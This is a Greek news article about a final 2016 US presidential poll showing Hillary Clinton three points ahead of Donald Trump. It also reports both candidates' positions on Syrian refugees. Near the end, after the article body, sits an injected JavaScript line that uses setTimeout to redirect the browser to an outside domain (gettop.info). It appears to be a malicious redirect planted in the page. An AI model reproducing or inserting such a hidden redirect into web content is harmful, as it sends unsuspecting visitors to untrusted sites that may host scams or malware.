Τελικό γκάλοπ: Προηγείται η Χίλαρι του Τραμπ με τρεις μονάδες

0
8

Μπροστά φέρνει τη Χίλαρι Κλίντον με τρεις μονάδες έναντι του Ρεπουμπλικανού Ντόναλντ Τραμπ (44% έναντι 41%) η τελική δημοσκόπηση του Bloomberg Politics-Selzer & Co.

Προδικάζει, άραγε, αυτό το γκάλοπ και το εκλογικό αποτέλεσμα; Σε καμία περίπτωση. Η διαφορά των δυο υποψηφίων είναι μικρή, στα όρια του στατιστικού σφάλματος. Τα πάντα, λοιπόν, θα κριθούν από την επιλογή των αναποφάσιστων. Είναι χαρακτηριστικό ότι ο Τραμπ ταξίδεψε στο Μίσιγκαν και στη Μινεζότα , τις τελευταίες ώρες, παρότι γνωρίζει ότι οι δύο Πολιτείες υποστηρίζουν παραδοσιακά τους Δημοκρατικούς υποψηφίους για την προεδρική εκλογή στο Λευκό Οίκο.

«Εδώ στο Μίσιγκαν έχετε βιώσει από πρώτο χέρι τα προβλήματα που προκαλεί το μεταναστευτικό πρόβλημα. Θέτει σε κίνδυνο την ασφάλειά σας, ενώ πιέζει ασφυκτικά τόσο τα σχολεία σας, αλλά και τους οικονομικούς πόρους της κοινωνίας σας. Η κυβέρνησή μου δε θα δέχεται πρόσφυγες, χωρίς τη σύμφωνη γνώμη των τοπικών κοινοτήτων», είπε, καυτηριάζοντας τη θέση της Χίλαρι για την υποδοχή προσφύγων από τη Συρία.

 

Από την πλευρά της, η  υποψήφια των Δημοκρατικών σχολίασε θετικά το σχέδιο του προέδρου Μπαράκ Ομπάμα για την υποδοχή 10.000 προσφύγων από τη Συρία, μέσα στο 2016, ενώ υποστήριξε ότι οι ΗΠΑ, μπορούν να πράξουν περισσότερα.

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here